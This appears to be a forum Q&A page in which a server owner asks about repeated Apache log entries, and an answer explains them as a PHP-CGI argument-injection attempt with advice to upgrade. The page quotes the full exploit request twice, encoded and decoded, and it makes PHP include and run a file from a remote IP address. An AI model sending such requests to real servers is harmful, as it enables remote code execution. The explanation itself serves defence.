CODEWITHSUNDEEP
phpapache
Guesser
Guesser

Reputation: 1857

PHP - does this look like a hack attempt

/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt

Lots of these are in my apache logs creating a 404,it looks possibly like a PHP hack attempt?

Upvotes: 0

Views: 722

Answers (2)

Amal Murali
Amal Murali

Reputation: 76666

To me, it does look like a hack attempt.

From PHP Release Announcement page

Some systems support a method for supplying a array of strings to the CGI script. This is only used in the case of an `indexed' query. This is identified by a "GET" or "HEAD" HTTP request with a URL search string not containing any unencoded = characters.

The URL-decoded query string looks like this:

/index.php?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://61.19.253.26/echo.txt

These are all -d switches, which are used to define php.ini directives. Basically, this is what it changes:

safe_mode=off 
disable_functions=null
allow_url_fopen=on
allow_url_include=on

And finally, there is auto_prepend_file=http://61.19.253.26/echo.txt -- this directive includes the PHP code located at http://61.19.253.26/echo.txt and execute it before the code inside index.php.

The echo.txt is hosted on a web server somewhere in Thailand and contains <?php echo "dsfer34w5rlsidfosdedfpsd"; ?>. This is probably used to check if your server is vulnerable to attacks.

And if you use Apache mod_cgi/mod_cgid to run a PHP version before 5.3.13 and 5.4.x before 5.4.3 update now: http://www.php.net/downloads.php

Upvotes: 4

Shiji.J
Shiji.J

Reputation: 1631

Yes.

Read the following page, it explained everything:

http://huguesjohnson.com/programming/hacking-attempt/

Upvotes: 1

Related Questions